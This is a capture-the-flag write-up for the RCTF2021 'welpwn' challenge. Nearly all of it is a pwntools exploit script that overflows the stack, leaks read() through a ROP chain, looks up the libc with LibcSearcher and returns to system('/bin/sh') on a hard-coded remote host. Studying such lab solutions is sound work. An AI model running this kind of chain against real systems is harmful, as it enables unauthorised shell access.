[RCTF2021]welpwn
题目分析

这一题拿来测试LibcSearcher的,没感情,直接上EXP:
from pwn import *
from LibcSearcher import *

# Solve script for the RCTF2021 "welpwn" challenge, in two stages that both
# ride on the same stack overflow (0x18 bytes of padding before the saved
# return address):
#   1. leak read@got via puts() and return to main so the program takes a
#      second input;
#   2. identify the remote libc from the leak (LibcSearcher) and return to
#      system("/bin/sh").
# The chain depends on fixed gadget addresses (the binary is presumably not
# PIE — confirm with checksec) and on the overflow being unguarded; either
# PIE+ASLR or a stack canary would break it as written.
r = remote('61.147.171.105',63406)
context(os = 'linux',log_level = "debug")

# Gadget and symbol addresses, hard-coded from the challenge binary.
# NOTE(review): pop_rsi is defined but never used by either payload.
pop_rdi = 0x4008a3
pop_rsi = 0x4008a1
pop_4 = 0x40089c
main_addr = 0x4007CD
elf = ELF("./welpwn")
puts_plt = elf.plt['puts']
read_got = elf.got['read']

# --- Stage 1: leak the address of read() in libc ---------------------------
r.recvuntil("Welcome to RCTF\n")
# pop_4 sits where the return address is; it presumably skips the next four
# qwords on the stack before the real chain (pop rdi; puts(read@got); main)
# starts — verify against the binary's copy loop.
payload = b'a' * 0x18 + p64(pop_4) + p64(pop_rdi) + p64(read_got) + p64(puts_plt) + p64(main_addr)
r.sendline(payload)

# The program echoes the padding first; the 3 bytes dropped after it are
# presumably the low, non-NUL bytes of pop_4 (0x40089c) that got echoed as
# well — check the debug log if the leak looks wrong.
r.recvuntil(b'a' * 0x18)
r.recv(3)
# puts() prints a 6-byte (48-bit) pointer; pad with NULs to unpack as u64.
read_addr = u64(r.recv(6).ljust(8,b'\x00'))
print("read:",hex(read_addr))

# --- Stage 2: resolve libc and return to system("/bin/sh") -----------------
# LibcSearcher matches a libc build from the symbol name and its low address
# bits; dump() returns that symbol's offset inside the matched libc.
# NOTE(review): LibcSearcher may offer several candidate builds — the chosen
# one must match the remote libc or the computed addresses are wrong.
libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump("read")
system = libc_base + libc.dump("system")
print("system:",hex(system))
# "str_bin_sh" is LibcSearcher's name for the "/bin/sh" string in libc.
bin_sh = libc_base + libc.dump("str_bin_sh")
print("bin_sh:",hex(bin_sh))
# Same overflow layout as stage 1, now calling system(bin_sh).
payload =b'a' * 0x18 +p64(pop_4) + p64(pop_rdi) + p64(bin_sh) + p64(system)
r.sendline(payload)
r.interactive()
